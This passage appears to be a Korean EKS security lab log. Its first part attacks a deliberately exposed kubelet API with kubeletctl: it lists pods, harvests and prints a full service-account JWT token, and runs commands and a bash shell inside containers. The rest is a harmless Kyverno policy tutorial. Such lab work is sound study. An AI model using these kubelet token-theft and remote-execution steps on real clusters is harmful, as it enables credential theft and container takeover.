"cgroupsPerQOS": true,
"cgroupDriver": "systemd",
"cpuManagerPolicy": "none",
"cpuManagerReconcilePeriod": "10s",
"memoryManagerPolicy": "None",
"topologyManagerPolicy": "none",
"topologyManagerScope": "container",
"runtimeRequestTimeout": "2m0s",
"hairpinMode": "hairpin-veth",
"maxPods": 50,
"podPidsLimit": -1,
"resolvConf": "/etc/resolv.conf",
"cpuCFSQuota": true,
"cpuCFSQuotaPeriod": "100ms",
"nodeStatusMaxImages": 50,
"maxOpenFiles": 1000000,
"contentType": "application/vnd.kubernetes.protobuf",
"kubeAPIQPS": 50,
"kubeAPIBurst": 100,
"serializeImagePulls": false,
"evictionHard": {
"memory.available": "100Mi",
"nodefs.available": "10%",
"nodefs.inodesFree": "5%"
},
"evictionPressureTransitionPeriod": "5m0s",
"enableControllerAttachDetach": true,
"protectKernelDefaults": true,
"makeIPTablesUtilChains": true,
"iptablesMasqueradeBit": 14,
"iptablesDropBit": 15,
"featureGates": {
"RotateKubeletServerCertificate": true
},
"failSwapOn": true,
"memorySwap": {},
"containerLogMaxSize": "10Mi",
"containerLogMaxFiles": 5,
"configMapAndSecretChangeDetectionStrategy": "Watch",
"kubeReserved": {
"cpu": "70m",
"ephemeral-storage": "1Gi",
"memory": "442Mi"
},
"systemReservedCgroup": "/system",
"kubeReservedCgroup": "/runtime",
"enforceNodeAllocatable": [
"pods"
],
"volumePluginDir": "/usr/libexec/kubernetes/kubelet-plugins/volume/exec/",
"providerID": "aws:///ap-northeast-2a/i-0ba38cf4130566468",
"logging": {
"format": "text",
"flushFrequency": "5s",
"verbosity": 2,
"options": {
"json": {
"infoBufferSize": "0"
}
}
},
"enableSystemLogHandler": true,
"enableSystemLogQuery": false,
"shutdownGracePeriod": "0s",
"shutdownGracePeriodCriticalPods": "0s",
"enableProfilingHandler": true,
"enableDebugFlagsHandler": true,
"seccompDefault": false,
"memoryThrottlingFactor": 0.9,
"registerNode": true,
"localStorageCapacityIsolation": true,
"containerRuntimeEndpoint": "unix:///run/containerd/containerd.sock"
}
}
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 pods
┌───────────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Pods from Kubelet │
├────┬──────────────────────────────────────────────────────┬─────────────┬──────────────────────────────┤
│ │ POD │ NAMESPACE │ CONTAINERS │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 1 │ aws-load-balancer-controller-64d7db49f7-8hd27 │ kube-system │ aws-load-balancer-controller │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 2 │ kube-prometheus-stack-operator-76bf64f57d-rjb5p │ monitoring │ kube-prometheus-stack │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 3 │ kube-prometheus-stack-prometheus-node-exporter-m74dv │ monitoring │ node-exporter │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 4 │ awscli-pod-5bdb44b5bd-9b99k │ default │ awscli-pod │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 5 │ eks-pod-identity-agent-cg64b │ kube-system │ eks-pod-identity-agent │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 6 │ aws-node-42pmp │ kube-system │ aws-node │
│ │ │ │ aws-eks-nodeagent │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 7 │ ebs-csi-controller-7d8bbc9b5d-sfpsm │ kube-system │ ebs-plugin │
│ │ │ │ csi-provisioner │
│ │ │ │ csi-attacher │
│ │ │ │ csi-snapshotter │
│ │ │ │ csi-resizer │
│ │ │ │ liveness-probe │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 8 │ ebs-csi-node-sghvh │ kube-system │ ebs-plugin │
│ │ │ │ node-driver-registrar │
│ │ │ │ liveness-probe │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 9 │ prometheus-kube-prometheus-stack-prometheus-0 │ monitoring │ prometheus │
│ │ │ │ config-reloader │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 10 │ myawscli │ default │ my-aws-cli │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 11 │ kube-proxy-fqnvd │ kube-system │ kube-proxy │
│ │ │ │ │
├────┼──────────────────────────────────────────────────────┼─────────────┼──────────────────────────────┤
│ 12 │ coredns-55474bf7b9-rdvg4 │ kube-system │ coredns │
│ │ │ │ │
└────┴──────────────────────────────────────────────────────┴─────────────┴──────────────────────────────┘
# Scans for nodes with opened kubelet API > Scans for for all the tokens in a given Node
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 scan token
1. Pod: prometheus-kube-prometheus-stack-prometheus-0
Namespace: monitoring
Container: config-reloader
Url: https://192.168.1.231:10250/run/monitoring/prometheus-kube-prometheus-stack-prometheus-0/config-reloader
Output:
eyJhbGciOiJSUzI1NiIsImtpZCI6ImRiNmQ0MTNmZTdiM2JiMmRmNWE3ZWFmOGUyNTI2ZjNlNzJmODhkN2EifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc0NDUwMzAyOSwiaWF0IjoxNzEyOTY3MDI5LCJpc3MiOiJodHRwczovL29pZGMuZWtzLmFwLW5vcnRoZWFzdC0yLmFtYXpvbmF3cy5jb20vaWQvRDNDMTg1MkFENzZCNEY3QUNCMzA1RTg0QzBFM0ZBRDUiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6Im1vbml0b3JpbmciLCJwb2QiOnsibmFtZSI6InByb21ldGhldXMta3ViZS1wcm9tZXRoZXVzLXN0YWNrLXByb21ldGhldXMtMCIsInVpZCI6ImY0Y2M0M2UwLTExZTItNGNhZS1iNzc5LWM1MTNiNTY1ZjNjOCJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoia3ViZS1wcm9tZXRoZXVzLXN0YWNrLXByb21ldGhldXMiLCJ1aWQiOiIyMGUxYWY4ZS1hYWI0LTRmMzQtOTE4YS05YTQ5NTgyMmI2MGYifSwid2FybmFmdGVyIjoxNzEyOTcwNjM2fSwibmJmIjoxNzEyOTY3MDI5LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6bW9uaXRvcmluZzprdWJlLXByb21ldGhldXMtc3RhY2stcHJvbWV0aGV1cyJ9.XqSWGwvrk0pwaFa6crqgosHPu9cJUDJCuLN5iS8n4oYY8wed50LDzG8FyqPISSRlSTnB4o19owpr45cxyDjDMmD2eYeySoEwHfzc1uFVH6sfIEG156YNX2ctN5i0lV1_RYD3bBbnenF0lgvQKEpVmc1hkl_vKf1iB33GvLM5Q6li_NvGDHJR3teDnIctxtQcAKt0TWxLQei1w47EiUKeUKZ4m6YTDCFrmj2km3JAjk7khlqQqI_AgnCGaz3SfcqU0fX5Itl2LD70lodiX4NS3UxJ0hca0gQ24GD4KVPoRwEnMS1BVjmW1q_Auyq1bbBFZ3w3gSp0Az2zA3uQxEl5rA
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Decoded JWT token │
├───────────────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤
│ KEY │ VALUE │
├───────────────┼────────────────────────────────────────────....
# 단, 아래 실습은 워커노드1에 myawscli 파드가 배포되어 있어야 실습이 가능. 물론 노드2~3에도 kubelet 수정하면 실습 가능함.
# kubelet API로 명령 실행 : <네임스페이스> / <파드명> / <컨테이너명>
curl -k https://$N1:10250/run/default/myawscli/my-aws-cli -d "cmd=aws --version"
# Scans for nodes with opened kubelet API > remote code execution on their containers
kubeletctl -s $N1 scan rce
# Run commands inside a container
(N/A:N/A) [root@myeks2-bastion-2 ~]# kubeletctl -s $N1 exec "/bin/bash" -n default -p myawscli -c my-aws-cli
bash-4.2#
--------------------------------
export
aws --version
aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager
exit
--------------------------------
# Return resource usage metrics (such as container CPU, memory usage, etc.)
kubeletctl -s $N1 metrics
k8s Native Policy Management
git
and kustomize
동작 : Dynamic Admission Control 로 실행, Mutating/Validating admission 에서 동작하여 허용/거부 결과 반환
설치 - HelmChart
# 설치
# EKS 설치 시 참고 https://kyverno.io/docs/installation/platform-notes/#notes-for-eks-users
# 모니터링 참고 https://kyverno.io/docs/monitoring/
## eks 는 kube-system 네임스페이스에 있는 리소스들이 kyverno 의 영향을 받지 않기 위해서 예외 처리를 해줘야함
cat << EOF > kyverno-value.yaml
config:
resourceFiltersExcludeNamespaces: [ kube-system ]
admissionController:
serviceMonitor:
enabled: true
backgroundController:
serviceMonitor:
enabled: true
cleanupController:
serviceMonitor:
enabled: true
reportsController:
serviceMonitor:
enabled: true
EOF
kubectl create ns kyverno
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno --version 3.2.0-rc.3 -f kyverno-value.yaml -n kyverno
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get all -n kyverno
NAME READY STATUS RESTARTS AGE
pod/kyverno-admission-controller-69665dff5-q79p8 1/1 Running 0 41s
pod/kyverno-background-controller-56bc88f4dc-bkt8w 1/1 Running 0 40s
pod/kyverno-cleanup-controller-64448c5b4d-p84l4 1/1 Running 0 41s
pod/kyverno-reports-controller-6bbd8f8d4-5sgfq 1/1 Running 0 41s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/kyverno-background-controller-metrics ClusterIP 10.100.212.217 <none> 8000/TCP 42s
service/kyverno-cleanup-controller ClusterIP 10.100.41.225 <none> 443/TCP 42s
service/kyverno-cleanup-controller-metrics ClusterIP 10.100.228.26 <none> 8000/TCP 42s
service/kyverno-reports-controller-metrics ClusterIP 10.100.245.29 <none> 8000/TCP 42s
service/kyverno-svc ClusterIP 10.100.225.8 <none> 443/TCP 42s
service/kyverno-svc-metrics ClusterIP 10.100.61.117 <none> 8000/TCP 42s
NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/kyverno-admission-controller 1/1 1 1 42s
deployment.apps/kyverno-background-controller 1/1 1 1 42s
deployment.apps/kyverno-cleanup-controller 1/1 1 1 42s
deployment.apps/kyverno-reports-controller 1/1 1 1 42s
NAME DESIRED CURRENT READY AGE
replicaset.apps/kyverno-admission-controller-69665dff5 1 1 1 41s
replicaset.apps/kyverno-background-controller-56bc88f4dc 1 1 1 41s
replicaset.apps/kyverno-cleanup-controller-64448c5b4d 1 1 1 41s
replicaset.apps/kyverno-reports-controller-6bbd8f8d4 1 1 1 41s
NAME SCHEDULE SUSPEND ACTIVE LAST SCHEDULE AGE
cronjob.batch/kyverno-cleanup-admission-reports */10 * * * * False 0 <none> 42s
cronjob.batch/kyverno-cleanup-cluster-admission-reports */10 * * * * False 0 <none> 42s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get crd | grep kyverno
admissionreports.kyverno.io 2024-04-13T00:25:27Z
backgroundscanreports.kyverno.io 2024-04-13T00:25:27Z
cleanuppolicies.kyverno.io 2024-04-13T00:25:27Z
clusteradmissionreports.kyverno.io 2024-04-13T00:25:27Z
clusterbackgroundscanreports.kyverno.io 2024-04-13T00:25:27Z
clustercleanuppolicies.kyverno.io 2024-04-13T00:25:27Z
clusterephemeralreports.reports.kyverno.io 2024-04-13T00:25:27Z
clusterpolicies.kyverno.io 2024-04-13T00:25:27Z
ephemeralreports.reports.kyverno.io 2024-04-13T00:25:27Z
globalcontextentries.kyverno.io 2024-04-13T00:25:27Z
policies.kyverno.io 2024-04-13T00:25:27Z
policyexceptions.kyverno.io 2024-04-13T00:25:27Z
updaterequests.kyverno.io 2024-04-13T00:25:27Z
# (참고) 기본 인증서 확인 https://kyverno.io/docs/installation/customization/#default-certificates
# step-cli 설치 https://smallstep.com/docs/step-cli/installation/
wget https://dl.smallstep.com/cli/docs-cli-install/latest/step-cli_amd64.rpm
sudo rpm -i step-cli_amd64.rpm
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kyverno get secret
NAME TYPE DATA AGE
kyverno-cleanup-controller.kyverno.svc.kyverno-tls-ca kubernetes.io/tls 2 2m26s
kyverno-cleanup-controller.kyverno.svc.kyverno-tls-pair kubernetes.io/tls 2 2m24s
kyverno-svc.kyverno.svc.kyverno-tls-ca kubernetes.io/tls 2 2m16s
kyverno-svc.kyverno.svc.kyverno-tls-pair kubernetes.io/tls 2 2m14s
sh.helm.release.v1.kyverno.v1 helm.sh/release.v1 1 2m39s
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d
-----BEGIN CERTIFICATE-----
MIIC7TCCAdWgAwIBAgIBADANBgkqhkiG9w0BAQsFADAYMRYwFAYDVQQDDA0qLmt5
dmVybm8uc3ZjMB4XDTI0MDQxMjIzMjU0OFoXDTI1MDQxMzAwMjU0OFowGDEWMBQG
A1UEAwwNKi5reXZlcm5vLnN2YzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
ggEBAJ1G5mNXDmS0ziRUWWsF/v9EHYVhRYyqCyuogDNaPnG7xm0zdj6rML0wPe93
pP5nQ8tqhu0K88EAAASesHChYcCwY2Ad7OlekyiYsPg1wPkgy2yRYD9Oaey8b5Ta
svLxUYzEUofZCysSXAO5mxmEV5iOpoGYlaGNoZE8AGV7IbttZnSTa23ArLoE2zPS
hD6uyfgeMtOexPj24jTY+tvWg/L8H/ovqUh1sHZyfbhTIBFuVaqm4JZ6i+EDlKYi
H/3tfT3WS/kwuUX0Lkze/vTmT6M//HGBeeRkHM3ZQmQ+tszNY6g3oiGvifXIGmzO
5PlHYbDsGJLCPE/FkCS7A5ZlSwcCAwEAAaNCMEAwDgYDVR0PAQH/BAQDAgKkMA8G
A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFASHCzD3XyqyQr1uNccmhsahxjdXMA0G
CSqGSIb3DQEBCwUAA4IBAQAZvTBOvepzw4y5ipPECVNN2xk7Qz7udRxxPjNRaQ5c
IKscK1qCHd8TynN72MT9zPKidt5YWwgDTfYPmbC32/rbPWsZVdmPPryWyGn5AtjE
r3UPMGFY7fespuOVmUYhrkTMUeedLXRhTUK86+27OkWyyqket9TUiqd/JnjOV8Xu
8snGlp0xGl0OnzqfCFEN1yC3fHbDpREAl846ZU2C26Wz6+ipmlHb9Ag+rDEocrh8
CdaelvGMfUQ8tV0I5TFxeD2qxRkvFZ/QJ2HnzDUjV/w3IaBjUioQc6v0D7CBf6XO
1/eudjiVCtiR1v0pX+IPavkbxtCQV0gvJHM0Ay47IOlb
-----END CERTIFICATE-----
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d | step certificate inspect --short
X.509v3 Root CA Certificate (RSA 2048) [Serial: 0]
Subject: *.kyverno.svc
Issuer: *.kyverno.svc
Valid from: 2024-04-12T23:25:48Z
to: 2025-04-13T00:25:48Z
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get validatingwebhookconfiguration kyverno-policy-validating-webhook-cfg -o jsonpath='{.webhooks[0].clientConfig.caBundle}' | base64 -d | step certificate inspect --short
X.509v3 Root CA Certificate (RSA 2048) [Serial: 0]
Subject: *.kyverno.svc
Issuer: *.kyverno.svc
Valid from: 2024-04-12T23:25:48Z
to: 2025-04-13T00:25:48Z
각 규칙은 [match]
선언, 선택적 [exclude]
선언 및 [validate]
, [mutate]
, [generate]
또는 [verifyImages]
선언 중 하나로 구성됩니다.
각 규칙에는 단일 validate
, mutate
, generate
또는 verifyImages
하위 선언만 포함될 수 있습니다.
Validation
# 모니터링
watch -d kubectl get pod -n kyverno
# ClusterPolicy 적용
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: require-labels
spec:
validationFailureAction: Enforce
rules:
- name: check-team
match:
any:
- resources:
kinds:
- Pod
validate:
message: "label 'team' is required"
pattern:
metadata:
labels:
team: "?*" # 여기에 주목
EOF
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get validatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 12h
eks-aws-auth-configmap-validation-webhook 1 12h
kube-prometheus-stack-admission 1 12h
kyverno-cleanup-validating-webhook-cfg 1 9m
kyverno-exception-validating-webhook-cfg 1 8m50s
kyverno-global-context-validating-webhook-cfg 1 8m50s
kyverno-policy-validating-webhook-cfg 1 8m50s
kyverno-resource-validating-webhook-cfg 1 8m50s
kyverno-ttl-validating-webhook-cfg 1 9m
vpc-resource-validating-webhook 2 12h
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
require-labels true true Enforce True 14s Ready
# 디플로이먼트 생성 시도
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create deployment nginx --image=nginx
error: failed to create deployment: admission webhook "validate.kyverno.svc-fail" denied the request:
resource Deployment/default/nginx was blocked due to the following policies
require-labels:
autogen-check-team: 'validation error: label ''team'' is required. rule autogen-check-team
failed at path /spec/template/metadata/labels/team/'
# 디플로이먼트 생성 시도
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl run nginx --image nginx --labels team=backend
pod/nginx created
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get policyreport -o wide
NAME KIND NAME PASS FAIL WARN ERROR SKIP AGE
...
55d2d17a-4665-492d-b927-014d9e9bb4c8 Pod nginx 1 0 0 0 0 24s
...
# Report Name 으로 조회
kubectl get policyreport 55d2d17a-4665-492d-b927-014d9e9bb4c8 -o yaml | kubectl neat | yh
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get policyreport 55d2d17a-4665-492d-b927-014d9e9bb4c8 -o yaml | kubectl neat | yh
apiVersion: wgpolicyk8s.io/v1alpha2
kind: PolicyReport
metadata:
labels:
app.kubernetes.io/managed-by: kyverno
name: 55d2d17a-4665-492d-b927-014d9e9bb4c8
namespace: default
results:
- message: validation rule 'check-team' passed.
policy: require-labels
result: pass
rule: check-team
scored: true
source: kyverno
timestamp:
nanos: 0
seconds: 1712968590
scope:
apiVersion: v1
kind: Pod
name: nginx
namespace: default
uid: 55d2d17a-4665-492d-b927-014d9e9bb4c8
summary:
error: 0
fail: 0
pass: 1
skip: 0
warn: 0
# 정책 삭제
kubectl delete clusterpolicy require-labels
Mutation
# 정책 생성
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: add-labels
spec:
rules:
- name: add-team
match:
any:
- resources:
kinds:
- Pod
mutate:
patchStrategicMerge:
metadata:
labels:
+(team): bravo
EOF
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get mutatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 12h
kube-prometheus-stack-admission 1 12h
kyverno-policy-mutating-webhook-cfg 1 16m
kyverno-resource-mutating-webhook-cfg 1 16m
kyverno-verify-mutating-webhook-cfg 1 16m
pod-identity-webhook 1 12h
vpc-resource-mutating-webhook 1 12h
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
add-labels true true Audit True 37s Ready
# 파드 생성 후 label 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl run redis --image redis
pod/redis created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod redis --show-labels
NAME READY STATUS RESTARTS AGE LABELS
redis 1/1 Running 0 7s run=redis,team=bravo
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl run newredis --image redis -l team=alpha
pod/newredis created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod newredis --show-labels
NAME READY STATUS RESTARTS AGE LABELS
newredis 1/1 Running 0 10s team=alpha
Generation
# 시크릿 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n default create secret docker-registry regcred \
> --docker-server=myinternalreg.corp.com \
> --docker-username=john.doe \
> --docker-password=Passw0rd123! \
> --docker-email=john.doe@corp.com
secret/regcred created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get secret regcred
NAME TYPE DATA AGE
regcred kubernetes.io/dockerconfigjson 1 19s
# Policy (정책) 생성
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: sync-secrets
spec:
rules:
- name: sync-image-pull-secret
match:
any:
- resources:
kinds:
- Namespace
generate:
apiVersion: v1
kind: Secret
name: regcred
namespace: "{{request.object.metadata.name}}"
synchronize: true
clone:
namespace: default
name: regcred
EOF
# 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl delete clusterpolicy add-labels
clusterpolicy.kyverno.io "add-labels" deleted
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
sync-secrets true true Audit True 36s Ready
# 신규 네임스페이스 생성 후 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl create ns mytestns
namespace/mytestns created
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl -n mytestns get secret
NAME TYPE DATA AGE
regcred kubernetes.io/dockerconfigjson 1 18s
# 삭제
kubectl delete clusterpolicy sync-secrets
# Install Kyverno CLI using kubectl krew plugin manager
kubectl krew install kyverno
# test the Kyverno CLI
kubectl kyverno version
kubectl kyverno --help
eksctl delete cluster --name $CLUSTER_NAME && aws cloudformation delete-stack --stack-name $CLUSTER_NAME